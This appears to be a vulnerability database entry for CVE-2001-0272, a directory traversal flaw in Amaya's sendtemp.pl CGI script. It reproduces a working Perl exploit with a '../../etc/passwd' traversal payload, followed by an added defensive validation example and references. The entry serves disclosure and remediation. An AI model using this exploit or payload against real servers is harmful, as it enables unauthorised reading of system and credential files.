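W3C Amaya Templates Server sendtemp.pl Remote Directory Traversal Vulnerability
Vulnerability ID | 1106245 | Vulnerability type | Unknown |
Published | 2001-03-04 | Updated | 2001-05-03 |
CVE ID | CVE-2001-0272 |
CNNVD-ID | CNNVD-200105-031 |
Platform | CGI | CVSS score | 5.0 |
|Vulnerability source
|Vulnerability details
W3C's Amaya is a WYSIWYG web browser and authoring tool. It includes a component called the Templates Server, which serves templates from an Apache web server for use in Amaya-based authoring. sendtemp.pl, a script in the Amaya Templates Server, has an input validation flaw: a remote attacker can exploit it to traverse the server's directories and read any file that the Apache server process has permission to read.
|Exploit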
#!/usr/bin/perl -w
# sendtemp.pl: A part of the Amaya Web development
# server contains a file disclosure vulnerability,
# which allows remote, read access to files
# on the server's file system, as whichever
# user the httpd is running as.
#
# The Vulnerability is really quite simple..
# When the `templ` argument is passed to
# sendtemp.pl it adds a link to the chosen stylesheet
# and a META field containing the publication's
# URL of the new file to the chosen template.
# For example:
# http://localhost/cgi-bin/sendtemp.pl?templ=template.xml
# This is all well and good, however..
# There is no sanity checking on the param you pass to the script..
# Ie: my $temp_file = param("templ");
#
# So by simply issuing a GET to:
# "http://localhost/cgi-bin/sendtemp.pl?templ=../../etc/passwd"
# The systems file system can be traversed and the passwd file can be read.
# (Assuming the http daemon hasn't been run under chroot())
#
# Follows is a simple exploit.. however, it's just as easy
# to do this manually in your web browser.
# I really couldn't be bothered to format the output in any way,
# It only encourages script kiddies.
#
# Finally, "l33t hax0r greetz" to..
# ne0h, b0red, loophole, shad0w and the old dL crew..
# Scott, Jim, Mike.. All of the guys at Global Intersec.
#
# Tom Parker - [email protected]
# MRX of HHP-Programming (www.hhp-programming.net)
# Global InterSec INC California - Security Audits, Penetration testing, code auditing.
use IO::Socket;
print qq~
----------------------------------------------------------
W3.ORG sendtemp.pl exploit by Tom Parker - [email protected]
MRX of HHP-Programming (www.hhp-programming.net)
- Global InterSec INC California -
----------------------------------------------------------
~;
if((!defined($ARGV[0]))||(!defined($ARGV[1]))) { print "Usage: %filename.pl <hostname> <file-to-get>\n"; exit 0; }
$SOCKET = IO::Socket::INET->new("$ARGV[0]:80");
print $SOCKET "GET /cgi-bin/sendtemp.pl?templ=$ARGV[1]\n";
print "Sent request for $ARGV[1] (http://$ARGV[0]/cgi-bin/sendtemp.pl?templ=$ARGV[1])\n";
while(<$SOCKET>) {
push @DATA, $_;
}
my $woot = join(' ',@DATA);
if($woot =~/$ARGV[1] wasn't found/) { print "$ARGV[1] dosnt seem to exist.\n"; exit 0; }
else { print "@DATA"; }
# milw0rm.com [2001-03-04]
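The root cause named above is that the value of `param("templ")` reaches the file system without any check. The following is an added example, not code from Amaya or from the exploit author, showing one way to validate such a parameter: an allowlist on the file name plus a containment check after symlinks are resolved. The helper name `resolve_template` and the temporary directory layout are assumptions made for the demonstration.

```perl
#!/usr/bin/perl
# Added example (not Amaya's code): validate a `templ`-style parameter
# before opening it. Directory layout and names below are constructed.
use strict;
use warnings;
use Cwd qw(realpath);
use File::Spec;
use File::Temp qw(tempdir);

# Return the canonical path of a template inside $base, or nothing if the
# requested name is malformed or resolves outside $base.
sub resolve_template {
    my ($base, $name) = @_;
    return unless defined $name;
    # Allowlist: a bare file name, no separators, no NUL, no leading dot.
    return unless $name =~ /\A[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}\z/;
    my $root = realpath($base);
    return unless defined $root;
    my $full = realpath(File::Spec->catfile($root, $name));
    return unless defined $full && -f $full;
    # Containment: once symlinks are resolved, the file must still be
    # under the template root.
    return unless index($full, "$root/") == 0;
    return $full;
}

# Constructed demo tree: one real template and one symlink pointing out.
my $tmp  = tempdir(CLEANUP => 1);
my $base = "$tmp/templates";
mkdir $base or die "mkdir: $!";
open(my $fh, '>', "$base/template.xml") or die "open: $!";
print $fh "<template/>\n";
close $fh;
open($fh, '>', "$tmp/secret.txt") or die "open: $!";
print $fh "outside\n";
close $fh;
symlink("$tmp/secret.txt", "$base/link.xml");

# Only template.xml is served; every other request is rejected.
for my $req ('template.xml', '../../etc/passwd', '/etc/passwd',
             "template.xml\0.txt", 'link.xml', '..') {
    my $path = resolve_template($base, $req);
    (my $shown = $req) =~ s/\0/\\0/g;
    printf "%-22s %s\n", $shown, defined $path ? "served" : "rejected";
}
```

The name allowlist alone blocks the `../` request shown above; the `realpath` comparison additionally covers a symlink planted inside the template directory.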
|Affected products
W3.Org Sendtemp.Pl 0
|References
Source: BUGTRAQ
Name: 20010212 W3.ORG sendtemp.pl
Link: http://archives.neohapsis.com/archives/bugtraq/2001-02/0259.html